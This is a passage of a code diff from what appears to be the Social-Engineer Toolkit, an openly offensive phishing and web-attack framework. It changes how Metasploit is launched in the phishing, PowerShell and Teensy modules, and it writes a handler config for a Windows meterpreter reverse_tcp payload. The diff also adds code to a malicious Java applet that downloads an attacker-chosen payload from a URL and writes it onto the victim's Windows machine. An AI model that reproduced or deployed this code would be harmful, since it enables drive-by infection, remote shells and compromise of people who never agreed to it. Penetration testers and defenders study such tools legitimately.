except: import src.phishing.smtp.client.smtp_web
child1.interact()
# if we arent using a custom payload
if custom != 1:
child1.interact()
if os.path.isfile(setdir + "/set.payload"):
port = check_options("PORT=")

BIN
src/payloads/exe/legit.binary
View file

Binary file not shown.

4
src/phishing/smtp/client/smtp_client.py
View file

@ -410,7 +410,7 @@ if not os.path.isfile(setdir + "/template.zip"):
if not os.path.isfile(setdir + "/unc_config"):
print_error("Sorry, you did not generate your payload through SET, this option is not supported.")
if os.path.isfile(setdir + "/unc_config"):
child=pexpect.spawn("ruby %s/msfconsole -L -r %s/unc_config" % (meta_path,setdir))
child=pexpect.spawn("%smsfconsole -L -r %s/unc_config" % (meta_path,setdir))
try: child.interact()
except Exception: child.close()
@ -430,7 +430,7 @@ if not os.path.isfile(setdir + "/template.zip"):
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
filewrite.close()
child=pexpect.spawn("ruby %s/msfconsole -L -r %s/meta_config" % (meta_path,setdir))
child=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (meta_path,setdir))
try:
child.interact()
except Exception:

2
src/powershell/powershell.py
View file

@ -56,7 +56,7 @@ if powershell_menu_choice != "99":
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
filewrite.close()
msf_path = meta_path()
subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
subprocess.Popen("%smsfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
print_status("Powershell files can be found under %s/reports/powershell/" % (setdir))
return_continue()

2
src/teensy/teensy.py
View file

@ -133,7 +133,7 @@ if payload_counter == 1:
print bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC
try:
if operating_system != "windows":
child1=pexpect.spawn("ruby %s/msfconsole -L -r %s/meta_config" % (msf_path,setdir))
child1=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (msf_path,setdir))
child1.interact()
except:
if operating_system != "windows":

53
src/webattack/java_applet/Java.java
View file

@ -88,8 +88,9 @@ public class Java extends Applet {
if ( osType < 1 )
{
// here we check for powershel
// here we check for powershell
File file = new File("c:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe");
if (sixthParm.length() < 4) {
if (!file.exists()) {
// URL parameter
URL url = new URL(downParm);
@ -125,8 +126,56 @@ public class Java extends Applet {
out.flush();
out.close();
}
// }
}
}
if ( osType < 1 )
{
// This is if we are using a custom payload delivery
// CUSTOM PAYLOAD FOR WINDOWS HERE
// Boom.
// if sixth parameter is greater than yes, which is CUST, four characters then trigger on custom payload for download
if (sixthParm.length() > 3) {
// URL parameter
URL url = new URL(downParm);
// Open the conneciton
URLConnection hc = url.openConnection();
// set the user agent string
hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2");
// grab content type
String contentType = hc.getContentType();
// grab content length
int contentLength = hc.getContentLength();
// pull input stream
InputStream raw = hc.getInputStream();
// stream buffer into raw input stream
InputStream in = new BufferedInputStream(raw);
// write the bytes out
byte[] data = new byte[contentLength];
int bytesRead = 0;
int offset = 0;
while (offset < contentLength) {
bytesRead = in.read(data, offset, data.length - offset);
if (bytesRead == -1)
break;
offset += bytesRead;
}
// close it
in.close();
// write file out to pfad
String filename = url.getFile();
FileOutputStream out = new FileOutputStream(pfad);
// close everything out
out.write(data);
out.flush();
out.close();
}
//}
}
// download file all other OS
if ( osType > 1 ){